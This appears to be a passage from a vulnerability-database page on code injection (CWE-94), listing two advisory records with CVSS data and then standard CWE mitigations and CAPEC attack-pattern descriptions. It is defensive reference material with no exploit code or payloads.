    }
  ]
}

GHSA-HW66-WJMJ-HWGG

Vulnerability from github – Published: 2021-12-16 00:01 – Updated: 2022-05-24 00:00
VLAI
Details

Windows Event Tracing Remote Code Execution Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-43232"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-15T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "Windows Event Tracing Remote Code Execution Vulnerability",
  "id": "GHSA-hw66-wjmj-hwgg",
  "modified": "2022-05-24T00:00:44Z",
  "published": "2021-12-16T00:01:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43232"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43232"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HW7Q-CG9Q-V7XJ

Vulnerability from github – Published: 2025-08-12 03:31 – Updated: 2025-08-12 03:31
VLAI
Details

SAP NetWeaver Application Server ABAP has HTML injection vulnerability. Due to this, an attacker could craft a URL with malicious script as payload and trick a victim with active user session into executing it. Upon successful exploit, this vulnerability could lead to limited access to data or its manipulation. There is no impact on availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-42945"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-12T03:15:27Z",
    "severity": "MODERATE"
  },
  "details": "SAP NetWeaver Application Server ABAP has HTML injection vulnerability. Due to this, an attacker could craft a URL with malicious script as payload and trick a victim with active user session into executing it. Upon successful exploit, this vulnerability could lead to limited access to data or its manipulation. There is no impact on availability.",
  "id": "GHSA-hw7q-cg9q-v7xj",
  "modified": "2025-08-12T03:31:52Z",
  "published": "2025-08-12T03:31:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-42945"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3585491"
    },
    {
      "type": "WEB",
      "url": "https://url.sap/sapsecuritypatchday"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Strategy: Refactoring

Refactor your program so that you do not have to dynamically generate code.

Mitigation
Architecture and Design
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Testing

Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Mitigation MIT-32
Operation

Strategy: Compilation or Build Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-32
Operation

Strategy: Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation
Implementation

For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].

CAPEC-242: Code Injection

An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.